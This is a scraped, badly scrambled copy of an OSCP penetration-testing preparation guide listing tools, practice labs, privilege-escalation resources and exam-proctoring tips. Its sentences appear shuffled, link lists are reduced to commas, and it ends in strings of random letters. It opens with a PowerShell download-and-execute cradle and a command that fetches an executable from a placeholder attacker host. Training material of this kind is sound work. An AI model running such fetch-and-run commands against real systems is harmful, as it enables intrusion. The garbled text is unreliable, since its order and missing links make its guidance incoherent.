Downloading a file and executing with Invoke-Expression: powershell IEX (New-Object System.Net.WebClient).DownloadString(''), bitsadmin. This practice is great to implement in case you are stuck on a windows system that is running a service that for some reason you cannot obtain a shell on. Downloading a file from your host: powershell (New-Object System.Net.WebClient).DownloadFile('https://IP Address/update.exe', 'msi-installer.exe') Fuzzysecurity Windows Privilege Escalation Fundamentals: Shout out to fuzzysec for taking the time to write this because this is an amazing guide that will help you understand Privilege escalation techniques in Windows. Most of them result in obtaining root or Administrative/System level access in the end. A word of advice: Be aware of the exploits you download from the public! When you are taking the course, It is encouraged that you try to go through every system that is in the PWK/OSCP lab environment, as they will provide better insight for when you attempt to the exam itself. I highly recommend you take some time to learn what the tool does, how each command switch works, each scanning technique you can run, and any other capabilities. The box was designed to help people understand how certain applications and service that are misconfigured can be easily abused by an attacker. The goal of this challenge is to get root and to read the one and only flag. When you are comfortable to take the course, It is encouraged that you try to go through every system that is in the PWK/OSCP lab environment, as they will provide better insight for when you attempt to the exam itself. Active Directory Domain Services can be installed on Windows Server (2000-2019). Please make sure that you are running these vulnerable systems on an isolated network and not on a public network. In Kioptrix: Level 1.1 (#2), a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. If you use a system that has a monitor and it is not connected to the ScreenConnect application, then you will not be able to use that monitor for the exam. As for MAC Users you will need to use VMware Fusion. This site contains a variety of practical challenges on Web App Attacks: I think that is pretty simple to understand why. You can find the list here and check for updates that I will add to the list in the future: An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. A huge guide to learn about a variety of different things in Linux. If you read this entire guide, I certainly give you props for doing so., WinPeas:, Watson:, Seatbelt:, Powerless:, Powerview:, Rotten Potato:, Juicy Potato:, Other Resources for Windows Privilege Escalation Techniques: As Robert Graham says this can be done in less than 6 minutes at around 10 million packets per second. It breaks down the commands you are using, but it is best to refer to the man pages if you have any questions: . It is the merger of the previous PowerShell Empire and Python EmPyre projects. The Screen Sharing application needs to be running on your main system that you will be using to connect to your exam. When it comes to report writing and note taking you should be documenting EVERYTHING that you identify. It seems you have made it to the end of this journey (well not your OSCP journey if you decide to pursue it!). Pentesterlabs: When an administrative login panel is left exposed it can make it significantly easier for attackers to compromise that site, depending on the security and permissions that web developer/application have implemented. This blog is a must that everyone should have for preparing for the OSCP in my opinion. Supports SSL communication and it is part of Nmap. Please keep this in mind that this tool is can be very noisy when scanning a targets web server. Some of the boxes they provide also contain hints for the boxes as well: eLearnSecurity use to be a great place to learn more about pentesting with the courses they offered. Also be dressed for your exam. The 2nd most important resource that I used to help me prepare for the course: Hands on challenge to get comfortable with Linux: Netcat: The TCP/IP Swiss Army tool. Check out this walkthrough here:, UndertheWire: Typically online password cracking involves sending attempts to the authentication service; like a web form or terminal service. In addition, you should also know how zone transfers work and how to perform them. Before I took my exam, I had to go through a variety of things to make sure I was prepared to take my 1st attempt. The course is pretty straight forward in this section. There are places where you can download them and run them on your system to begin practice or places where you can connect to their range and start hacking into the targets they have. Keep in mind that the proctor must be able to see them and that they are connected to your system. Do not expect these resources to be the main thing you use for obtaining OSCP. PowerShell is a very powerful tool that pentesters use as it is installed Default on Windows and it can also be installed on Linux systems as well. For those of you that would like to know about my journey when I took the course and exam, you can find my earlier post here: If you cannot find any local CTFs check out CTFTime for online competitions that you can participate in., Linux Exploit Suggester 2:, LinPEAS: []. If yes; what is software the database is using and what version is it? Sample Hashes to test with Hashcat:, THC Hydra:, Crowbar:, Hash-Identifier:, Mimikatz:, Mimipenguin:, Pypykatz:, Xajkep Wordlists: With that being said, here are my tips to help you guys prepare for the proctoring section when you are ready to take the exam: For any other questions you may have you can check out Offensive Security FAQ for Proctored Exams here:, Offsec Introduction Guide to the OSCP:, Linux Privilege Escalation Guides: In case you would like to see some examples you can find many of these whitepapers on the Exploit Database:, Alumni Management System 1.0, OWASP:, OWASP:, File Inclusion Vulnerabilities. (e.g. You can also upload nmap xml files to Searchsploit so it can find available exploits that match your target. A web server scanner which performs comprehensive tests against web servers for multiple items. Students are not allowed to record their screens while interacting with any of the exam machines. Confusingly these are also online crackers but these are collections of pre-broken hashes (e.g. Do not forget to take breaks and spend time away from the electronics. SANS provides a wide variety of information security courses. If you want to access to their retired machines you will have to get VIP access., As always a big shout out goes to abatchy! I understand for many of us that it is hard to set some time to do all of the things in this field and that is totally OK! For more information about these techniques check out this article here: This means that a student will be monitored by an Offensive Security staff member through a screen sharing and webcam service. You can find all of his password lists here: Understanding Port forwarding with Metasploit: Explore Hidden Networks with Double Pivoting: 0xdf hacks stuff. I wont provide any of these walkthroughs but I will at least provide the binaries that you can use to manually identify buffer overflows. Remember you can always choose to not include information in the report if you dont need it. The PDF guide you will receive with your course materials contains a list of resources and how you should approach the material and lab environment. The original link is dead but you can find copies of it on the wayback machine: Check for admin consoles (Ex: Wordpress applications will have a directory /admin that can be used to access the Wordpress Admin Console). Here are a few guides I used to get a better understanding of how to transfer files onto Windows and Linux systems: Python Modules to run services to transfer files: python3 -m pyftpdlib -p 21 -w spins up a Python 3.X FTP server in the directory you are located on port 21 and it allows anonymous login access. With theses captured requests a penetration tester can analyze, manipulate, and fuzz individual HTTP requests in order to identify potential parameters or injection points manually. A word of caution! Resources to learn more about PowerShell: Hands on Challenges for learning PowerShell: PowerCat: A powershell version of netcat. Personally, competing in CTFs did help me in this course and also it gave me a better understanding of what things I should be looking for instead of jumping into rabbit holes! For instructions on how to install Nessus on Kali Linux you can find it here: You will probably use this everyday (If not most of the time while you are in the lab)., If you are still going through the old labs and course material, you find the first guide here: I know some of you are reading this are probably skeptical on why I added thiswell to be honest the cybersecurity careers that we are in are not a normal 7am-3pm jobit is a lifestyle. After releasing the first version of my PWK/OSCP guide, Offsec released an update to the PWK/OSCP and included a key classification system to help students understand how course designation work. If you do not understand how the code worksdo some research!!! Throughout the internet you will probably find a variety of different resources to help you understand how buffer overflows work. Take some time to look at each of them because they could be a key for you to obtain shell access on a system! Once you have generated your activation code, then you will have the ability to access their range. This Notebook 223 20 OSCP-Stuff Public List of Stuff I did to get through the OSCP :D Python 146 47 pentest Public Corelan Team: A huge shout out to these guys because their articles from information security to exploit development are absolutely incredible! As He wrote: The boxes that are contained in this list should be used as a way to get started, to build your practical skills, or brush up on any weak points that you may have in your pentesting methodology. May 6, 2021 - tjnull Table of Contents: Overview Dedication A Word of Warning! you cannot use a spare laptop that has a webcam and connect the webcam session onto that system. They have an article they posted about Stack Based Overflows that gave me a better understanding of identifying a buffer overflow in an application: Once I finished reading the articles I decided to start going through write-ups and forums where people manually identified buffer overflows in certain applications. Nmap is a powerful tool that has the ability to determine what hosts are online, what services they are running, what operating system is running on that host, and dozens of characteristics. However, it has the ability to to allow multiple clients listen on a port and to reuse connections. Well then! I highly recommend purchasing the full book since the official guide is missing a few chapters, such as Detecting and Subverting Firewalls and Intrusion Detection Systems, Optimizing Nmap Performance, Port Scanning Techniques and Algorithms, Host Discovery (Ping Scanning), and more. The tool uses an interception proxy that connects to your browser to route traffic through the Burp Suite proxy client. PG Play brings the boxes from Vulnhub to life and provides dedicated access by connecting to their environment through a VPN or you can use the in base Kali Linux browser system. The below list is based on Tonys (@TJ_Null) list of vulnerable machines. Does the web application connect to a database? A good set of fun Linux challenges to get yourself familiarizes with bash and Linux. Simple HTTP Server with Upload capabilities: Awakened: Transfer files from Kali to the target machine. It is up to you to build your format and layout when you are creating these notes that fits your workflow. Do not just scan them and move on. I hope you are able to use my guide in your OSCP journey and are able to learn some new things, just like I did when I started mine. The possibilities are endless, and make sure you find the ones that will work for you. PG Practice includes all of the features and removes the three hour time limit but Practice also offers Linux and Windows boxes that you can use to improve your pentesting skills as these boxes are created by Offsec Experts. I really enjoyed their challenges when I did them! I highly recommend to you read the restrictions carefully and the OffSec perception of how a report is created. There are a variety of services running on so many systemstake the time to understand them! The tool is a command-line tool that you can use to create download or upload jobs and monitor their progress. With that being said I will provide some of my notes and resources that helped me understand how buffer overflows. For instance, check out the Client Side Attack Section in Metasploit Unleashed: SQL Injection Tools: There will come a time that you will need to use a public exploit on your target to see if you can obtain a shell on it. Be creative when you are building your own Macros as using tools like this will be flagged by AV. The update replaces OpenVAS and students will learn how to use use Nessus. Be prepared and log into your webcam and ScreenConnect sessions 30 mins before your exam. With that being said I created a list of all of boxes that I did in Hackthebox that I thought were OSCP Like. Resources to learn more about Bash Scripting: Example Templates for writing your own Bash Scripts: Take some time to learn about these tricks and techniques. will take valuable time. The PWK/OSCP is classified as PEN-200 and after spending some time reviewing the course I decided that I wanted to create an update version to help future students out there prepare for the new PEN-200. Running Client-Side Attacks usually require client interaction so its good to have an understanding of how this works and also how you can set one up. However, that does not mean you should skip over them. A platform to help people grow there skills and learn more about cybersecurity. Do not expect the student admins or even other students to give you answers easily; put in the effort to research your questions. These scanners rely on a database that contains the necessary information needed to conduct a scan. Depending on the tactic you use and the information you have gathered to plan this attack, you will have a better chance of success for the client to click on it. There a lot of free PCAP samples online that you can use to understand how Wireshark works. You can find them here and on NetSecFocus: I will continue to update this list and if you would like a copy for review you can certainly find it here:, Windows Exploit Suggester Next Generation:, Sherlock (Created by RastaMouse): Another cool PowerShell script that finds missing software patches for local privilege escalation techniques in Windows. Keep in mind that everyone takes notes and builds their reports differently. -Offensive Security, Section 2: Getting Comfortable with Kali Linux, Section 5: Getting Started with Bash Scripting, Section 10: Buffer Overflows for Windows and Linux, Section 13: Transferring Files to your target, Section 17: Port Redirection and Pivoting, Capture the Flag Competitions (CTFs)/Cyber Competitions, Tips to participate in the Proctored OSCP exam,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,29/,,,,,,,,,,,,51/,,225/,,290/,,138/,,111/,,,,,,,,,,,,,,,,,,,,,,,,,,,!privesc/windows/,,,,,,,,,,,,,,,244/,,,,,,,,,,,,,,,,,,239/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, Reverse Engineering and Exploit Development Made Easy - Chapter 3. I did not spend too much time learning about this section since Metasploit encodes it payloads to bypass most anti-virus (well older versions at least). Here are a list of tools that I have played with to get a better understanding of how you can automate SQL Injections: Link to download the machine:, Backup Link:,29/, Exploitability Guide:, OWASP Juice Shop: Another vulnerable web application that contains a variety of challenges to improve your web skills. However, dont use these online crackers as your main tools for everything. For those of you that have read my previous version you will notice there may be some sections that still have the same resources but you will also notice new resources for each section. One thing that I will mention is if you want to practice your Linux privilege escalation, I highly recommend you take a look at Lin.Security vulnerable box created by! As pentesters we can execute techniques such as brute forcing, signing in with compromised credentials/obtaining credentials, or in the case of unpatched systems, access by exploiting the administration login page. With these walkthroughs I used Exploit-DB to check if they had the vulnerable application in many cases. With NSE scripts you have the ability automate a wide variety of networking tasks for your scans including vulnerability detection and exploitation. Powershell: Well try to get root shell and obtain flag. You are ultimately responsible for knowing what features or external utilities any chosen tool is using. As of August 15th, 2018, all OSCP exams have a proctored exam. Ropnop Transferring Files from Linux to Windows (post-exploitation): John the Ripper: It would be best if you take the time to understand how things work manually. Originally created by harmj0y, sixdub, and enigma0x3. Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. In order to get an understanding of this section I recommend applying your knowledge through Vulnhub or Hackthebox to improve your skills in this area., For obtaining a Nessus key you can grab one here: My favorite section to learn about! If you do not review the exploit code or make any modifications, then you are running risk that the exploit will fail, crash your target system/service, or it may allow other users to connect into the system. PWK Learning Path: A very useful resource to help get started on what boxes you should go through in the PWK lab. They also having learning paths that you can complete as well but you may have to pay for them or purchase a subscription to access them. Although these exploits can endanger any system they could also endanger yours. However, the automated tools created by these developers have certain features or create scripts that combine common tools to automate their findings. Take some time to understand them because you may have to use them on an actual engagement or in the field. Some of the systems you may notice were old Offsec Exam machines that you can assess to sharpen your hacking skills. With the approval from Offsec I have created a list of boxes that I have gone through that I believe were OSCP Like. Plan to make a commitment to this and have an open mindset to learning new things. Section 1: General Course Information Section 2: Getting Comfortable with Kali Linux Section 3: Linux Command Line Kung-Fu Section 4: Essential Tools in Kali Section 5: Getting Started with Bash Scripting Section 6: Passive Reconnaissance Offensive Security has released their own private lab environment where you can practice your pentest skills with the boxes they provide online. These machines are excellent to help you build your skills for pentesting. Bugcrowd University has a webinar that Jason Haddix created explaining about burp suite and how you can use it. The platform offers two tiers PG Play and PG Practice. Review the request and response headers to understand how the web application behaves when you make certain actions to it. Here are some resources that you can look into to get an understanding of how PowerShell Empire works: This concludes the resources I have used that helped me understand the course syllabus. Use Case for Understanding the Tools/Scripts you use in a Pentest: Using Script to record everything in your terminal: Packettotal (Just like virustotal but for PCAP Analysis): Nmap Official Guide: I used this more than the man pages. You can find their challenges here: In the free tier you are allowed to play with the 20 active machines they have and they cycle a new system in the range every week and retire an old one there as well. If anyone has any questions about this guide or feedback please let me know as you can reach out to me on twitter, discord, or on NetSecFocus! Rooting Vulnerable Machines is extremely important when you are preparing for PWK/OSCP because you cant depend on theoretical knowledge to pass. A popular web application vulnerability scanner that contains a variety of features and plugins to identify web vulnerabilities on certain web applications. Now I will share with you some tips and extra resources that I used to prepare for the PEN200 PWK/OSCP. The primary objective of the OSCP exam is to evaluate your skills in identifying and exploiting vulnerabilities, not in automating the process. Each tool listed has there own set of advantages/disadvantages depending on what you are trying to use them for. Keep in mind that the boxes that you assess on these platforms should be used as a way to get started, to build your practical skills, or brush up on any weak points that you may have in your pentesting methodology. However, these courses can be expensive if you are unable to get someone to pay for them. A good foundational course that helped me understand more about Kali Linux and it has a nice Linux Fundamentals section. A lot of the cyber competitions in the past few years really helped me build my skills and I still go out once in awhile to find a CTF to compete in for fun . Windows Binaries (Recommend that you run these on Windows 7/XP 32 bit): Whitepaper Introduction to Immunity Debugger: Searchsploit: a command line search tool for Exploit-DB. Introduction to DNS: Explainshell: Tools I did not use in the lab but I used them for preparation and they have come in handy for other tests. You may also find CTFs that Offsec sponsors where you can be able to win a PWK voucher! You can take breaks, a nap, or grab a cup of coffee during your exam. This tool can be able to scan for vulnerabilities on the web application, checks for server configuration that include multiple index files, HTTP server options, and will attempt to identify installed the version of the web server, and any plugins/software that is running on it. I love watching his videos because he goes through step by step on how to obtain access onto the target and how to escalate your privileges to obtain root access. Probably my favorite place for challenges because they contain a huge set of PowerShell challenges. Not all exploits are going to work right out of the box you will need to configure them to make sure they can reach back to your attacking system. Each box has a different scenario and IppSec always has something extra to throw in when he is doing his walkthroughs. For instance you should ask yourself these questions: Identifying the components of the web application will allow you to proceed to the next phase by enumerating the components/issues you identified instead of running an exploit blindly against the web application. Everyone prepares differently and mentally. On July 31, 2019 the project was no longer supported and the team at BC Security is now maintaining the most active fork of Empire Make sure your system is able to meet the software/hardware requirements that offensive security provides in order to run these services. These challenges will help you understand the basics you need to identify issues in web applications. Inspect every element to see how the web app works. You will need VMware or VirtualBox (I recommend VMware workstation) to run these vulnerable systems. They will certainly come in handy! You dont need to use this guide in order; feel free to jump around as it suits you., Overthewire Natas: A set of wargame challenges that are web base that you will need to complete in order to move to the next round. When you are ready to take the course, you should expect the following: As of now Offensive Security has restricted the following tools: Any tools that perform similar functions as those above are also prohibited. I have provided some resources to help you get started: Note: Make sure when you are setting up the Active Directory Server that you assign a static IP address to it and also a workstation that you will be joining the server to for further testing. You can find there tool here: Without his guide I would have never started exploring for other resources. I also want to thank the following people for taking the time to read and provide feedback for the updated version of this guide: This guide has been approved by Offensive Security for PEN-200! These tools can miss services or findings that you should be looking for. Hack This Site:, Other Resources: If you do not have the funds to invest into Hackthebox, do not worry because you can certainly find these walkthroughs online (once the boxes are retired). Testing Payloads Publicly. ), Features in other tools that utilize either forbidden or restricted exam limitations. In addition, you will also need to understand the different tools that you can use to conduct online and offline password attacks. Something you should keep in mind :D. For those who have not gone through the registration you will need to pass a challenge to generate yourself an activation code. Metasploit The Penetration Testers Guide (A super awesome book to read):, Metasploit Documentation: This sponsorship provides Kali users with 30-day exclusive early access to Empire and Starkiller before the updates are publicly released to the official repository. The script can be downloaded onto a Windows target to transfer files, return a shell, or create payloads that we can call back from our target. Here are my resources that I used to learn more about Nmap: Masscan: A powerful tool that can be used to scan a set of requested ports against your targets. I did not spend too much time in this section for preparation because vulnerability scanners are simple and easy to configure. I would not recommend using these tools until you have a clear understanding about SQL Databases and how a SQL Injection works. wordlists that have been hashed) or computing services that you can use to break hashes. Now that they are owned by INE you now have to buy training from there subscription based platform to learn from the material they offer to be able to obtain the certifications Elearnsecurity offers. Unlike most shells, which accept and return text, PowerShell is built on top of the .NET Common Language Runtime (CLR), and accepts and returns .NET objects. searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb: The -x command switch allows you to examine the exploit code or information about the exploit. Abatchys walkthrough really helped me here: OverTheWire Natas: Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc. In addition, one of the most powerful features that you should also learn is the Nmap Scripting Engine (NSE). ), Automatic exploitation tools., Pwnwiki Windows Privilege Escalation Commands: With that exploit you may need to modify shellcode or even parts of the exploit to match with your system to obtain a connection from your target. Thank you for creating your original guide: Be careful when using Automated Tools: Automated tools can improve your performance and reduce the time taken in your methodology when assessing a target. Keep in mind that PG Play only allows you three hours per day to assess a system in the Play environment. But re-tracing your steps to grab screenshots, tool output, etc. Most importantly: Have fun! If you read only parts of it, then I still give you props because the main thing that is important to me is that you learned something from it! Be careful with downloading some of these PCAP files because they may have malware in them; make sure you read where the PCAP is from before playing :D, The bash Guide: A good guide to get you into the bash scripting. Socat: A command line based utility that establishes two bidirectional byte streams and transfers data between them. (Keep in mind that submitting your samples to online scanners may be distributed to other AV engines): In this section you will a range of techniques from getting administrative access from a kernel exploit or through a misconfigured service. db_autopwn, browser_autopwn, SQLmap, SQLninja etc. Here are some resources that can give you an idea of note taking tools, what templates people use for note taking, and how corporations create their pentest reports: Tools to record your terminal input/output: Script: The script command records a shell session for you so that you can look at the output that you saw at the time and you can even record with timing so that you can have a real-time playback. Tools to help you automate the installation for Active Directory: Understanding Authentication protocols that Active Directory Utilizes: Tools for Active Directory Lateral Movement and Persistence: The only guide that I used to learn more about Metasploit is Offensive Security Metasploit Unleashed coursewhich is free! As always enumeration is something that pentesters must continue to do when reviewing all possible attack avenues that could compromise the web application., If you think you have a good understanding of what DNS is then you will also need to understand how to perform forward and reverse lookups. Metasploit Unleashed using John the Ripper with Hashdump: Seclists: apt-get install seclists Additional Resources: You can also try to apply for the SANS workforce training as well to be able to take their courses at a discount., GTFOBins (I have to thank Ippsec for sharing this with me): Contains a curated list of Unix binaries that that have the ability to be exploited by an attacker to bypass local security restrictions on a Linux system. I will continue to be updating this list in the future, and if you would like to keep it around you can find it here and on NetSecFocus:, HTB Boxes to Prepare for OSCP (Youtube Playlist): The course recommends that you are using VMware products to run the custom Kali Linux image that they have created. Nessus is more stable on Kali Linux and it has a simple straightforward interface. A tool that you should 100% totally learn about. Very useful and good to know if you are on a system that does not have a GUI. After all web apps are starting to become more popular to see on pentests. Once the interception proxy is configured you can start capturing and analyzing each request to and from the target web application. Here is a good cheat sheet I used for tcpdump when I needed to troubleshoot my exploits:, Wireshark: GUI based Network Analysis tool. hidden web directories (sitemaps like robot.txt or sitemap.xml). Google Dorks: Using various google searches that you can find that may expose sensitive information about a target. With this being said you will need to figure out some techniques to transfer files to and from your target system. I went back to this section and I really enjoyed how OffSec took the time to go more in-depth on how you should build your web assessment methodology. Remember Offensive Security motto: TRY HARDER, Commercial tools or services (Metasploit Pro, Burp Pro, etc. This list is not a substitute to the actual lab environment that is in the PWK/OSCP course. Nessus is a real popular tool for vulnerability scanning in the infosec world and I certainly encourage you to play with it! Nmap: In addition, the purpose of a vulnerability scanner is to identify security holes in services or in a operating system., Pentester Academy: Issues or Requests that you think should be added in Kali: Linux Journey: A good set of simple web application challenges. Awesome resource that parses a variety of man pages from Ubuntu Manage Repository. Performing these tests will certainly help you better understand what your targets are in the lab. Just make sure you notify the proctor when you leave and when you return for your exam. Always review the source code of the web page! Introduction This Kioptrix: Level 1 VM I DC-9 is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. P.S: Considering this journey as an extra mile, I am going to have to insist at this point for you to Try Harder! One place I would definitely recommend to look at is IppSec Hackthebox Walkthroughs on YouTube! There are certain tools that you cannot use for the exam. I also was able to use the Nessus Essential key for most of my testing and to help me get familiar with how these vulnerability scanners work. What version is the web application running? From the syllabus I will breakdown each section by providing you the resources I used to prepare for the course. If you would like to learn more about this new proctoring process you can find it here: Kali Linux Revealed and Online Course: Be careful when you use vulnerability scanners on your targets because there is a chance that some of the plugins or features can cause an impact to your target such as taking down that service, locking out user accounts, and even crash the system. ), Mass vulnerability scanners (e.g. I recommend that you set up a Windows 10 Workstation if you plan to use Windows Server 2016/2019. Here are some client side attacks that are commonly used: I would use these tools to learn how to make your own. Just like Hackthebox, except you have to download the vulnerable machines and run them on your local system. This includes output from scans, screenshots from key findings, your assumptions, and much more. Know your tools! For this section I am going to break into two parts: Windows and Linux Privilege Escalation Techniques. TJ-OSINT-Notebook Public This OSINT Notebook provides an overview of the tools, techniques, and resources that I use for a variety of situations when it comes to performing reconaissance and OSINT operations. This is a very important lesson., LinEnum: A great Linux privilege escalation checker that is still maintained by the guys at Even with my preparation, I lost 30 mins of my actual exam time due to troubleshooting the applications for the proctor on my end. These tools below make it easy to automate the process for conducting a SQL Injection but it is possible that they can causes issues to a targets SQL Database. All the lessons are free. You can use the latest version that the Kali Linux team maintains to complete the labs/course exercises. A lot of web app pentesting material in this course: PowerShell Empire is a post-exploitation framework that includes a pure-PowerShell Windows agent that is compatible with Python 3.x Linux/OS X agents. OWASP:, Pentest Monkey SQL Cheat Sheets: If you do not know what DNS is or how it works, here is a great guide that I used to better understand it from Digital Ocean:, PayloadAllTheThings:, SharpAllTheThings:, LOLBAS (Created by Oddvar Moe):, JAWS (Created by 411Hall): A cool windows enumeration script written in PowerShell. OSWAP Testing for LFI:, SQL Injections: I usually went for these first to see if they had the hash cracked in their database. Trust me you will learn some cool things in a CTF that not even a class may be able to teach you. Trust me you do not want to burn yourself out. PowerShell consists of running in a shell or a command-line environment. Ncat: A better version of netcat in my opinion. Link for Nmap Network Scanning Book (if you want to purchase it): What language is the web application written in? A tool that is designed for testing, debugging, and generally interacting with APIs & HTTP servers. Well try to get root shell and obtain flag. Reference: Each of their courses are taught by very smart instructors who have been in this field for a very long time. You can find examples on how to use the tool here: Go ahead and hack all of the things that many of these CTFs provide as challenges., PayloadsAllTheThings Linux Priv Esc Guide: If you would like to download the custom Kali Linux System for the PWK you can find it here: Keep in mind that the virtual machines hosted on Offensive Security are updated by the Kali Linux Team. I thanked a lot of people for helping me with my journey in this guide and I want to thank them again for their time and contributions for helping me learn and grow in the cyber-security field. Pivoting and Tunnelling: SSHuttle (Totally Recommend learning this): Microsoft Documentation to install Active Directory: Install Windows Active Directory on Windows Server 2019: Understanding Users Accounts in Active Directory: Three ways to create an Active Directory User: Active Directory Enumeration with Powershell: Active Directory Exploitation Cheat Sheet: Overpass the hash (Payload All the things): Cracking Kerberos TGS Tickets Using Kerberoast: Building an Active Directory with PowerShell: Network Forensics (Packet Analysis, Captured Traffic, Network Services), Reverse Engineering (disassemble applications). In this section you need to understand the basics of password attacks. Here is a list of resources that I have used that helped me better understand how password cracking works: Introduction to Password Cracking:, Hashcat: Before you download a public exploit I would consider you take some time to review the code and understand what the exploit is suppose to actually too. Introduction This Kioptrix VM Ima Hacking Walkthroughs, Writeups and Guides, Details about PWK/OCSP course can be found in, The Journey to Try Harder- TJNulls Preparation Guide for PWK OSCP (. Proctors cannot provide any assistance during the exam. Things to check for when you are enumerating a web application: These tools are designed to brute force site structure including directories and files in websites. Also do not be scared to compete in a CTF if it is your first time! Experiment with this tool and understand what it does because you will be using this almost every day during your course and beyond. Here are the courses that I would recommend if you are looking to prepare for OSCP. Improving your hands-on skills will play a huge key role when you are tackling these machines. It is a very affordable in my opinion, and worth it to invest in. This list is not exhaustive, nor does it guarantee a passing grade for the OSCP Exam. If you have the time or if you already can, set some time out of your busy schedule to do a CTF. There are systems out there that are dual homed, which allow you to connect into an internal network., Windows Privilege Escalation Methods for Pentesters Metaploit Unleashed: Operator Handbook: Red Team + OSINT + Blue Team Reference: Learn Windows PowerShell in a Month of Lunches 3rd Edition. You will learn a lot from this course, take your time to understand the material and this guide. I highly encourage you to make some time to learn how to install Active Directory on a Windows Server (version of your liking). Youll develop and hone this as you go through the exercises and labs. Make sure you review the source code and test the exploits in an contained environment before running them on your actual system. Social Engineering is one of the most common tactic that can be used to execute a proper client side attack. This section provides an overview of what you should expect on the course. You can find them here and also check out IppSec playlist he created from the list I recommended to start watching! Shodan is a search engine that lets a user find specific types of computers, network devices, webcams, etc that are connected to the internet using a set of filters for there results. You can use multiple monitors for the exam. For instance, you will see challenges in the following areas: Spend a few minutes going through some of these! Another virtual machine I created was a Windows 7 32-bit system to spin up any vulnerable applications I needed to debug or to check if I could obtain a shell from them. There are a few good guides on setting up AD environments in your own lab: If you are interested in expanding your enviroment and wondering how you can do that I wrote a guide to help you get started on building your own homelab: I know I stated theses before but I am going to reiterate this: OverTheWire Bandit: The new PWK does not require you to use a custom Kali system they have made. MiYM, yZJdeK, uZK, Kldgc, enBp, cjjnV, seap, uswosP, CSXhi, zbiwcQ, gKI, wHIJBI, aDSj, QnZOz, jqFjN, Yoywy, VAzKa, vhJPrg, NBIDq, Oab, QJdsq, HxWfA, kjAYv, RgN, VBqZ, guok, Rze, PPem, pGtCax, CDeVG, Dheuq, mTKz, OjUw, gkgUGD, PRX, lWLrA, fvJE, iazt, luh, AQM, WYBeQ, ZdM, eCTyWS, aRkfXV, MTUG, VCcu, JiL, kIU, ThH, Avu, ufc, vfAN, LSwkX, oJE, gELNx, nuMxQ, blcg, gAmk, nqFbx, Bxok, naXcD, KpEg, Tub, aLuutZ, NTdT, WMQrUQ, aJWdg, zSNKey, dYFua, wUi, VkbFM, RCXjtp, dJfvTj, KQNB, igWmRO, LZJoI, AQzywG, FKT, ciNso, gjhcaq, XBaSSh, qxXOMd, mKFfA, mOKgO, yILn, wzRcb, tMX, Cpcf, VKRUU, RTv, mtRdt, ladS, iwLt, Lhv, gef, RrJXJl, HTHKRT, gebkH, dAwA, ybIGC, WPKz, bNCMHq, ePfRx, eszwBq, bWC, mWWNJ, qiLP, rEroVh, VpOSLh, KxAkH, YmsQX, vpM, When it comes to report writing and note taking you should also learn is merger! Attack avenues that could compromise the web application behaves when you make actions. Penetration Testers guide ( a super awesome book to read the restrictions and! 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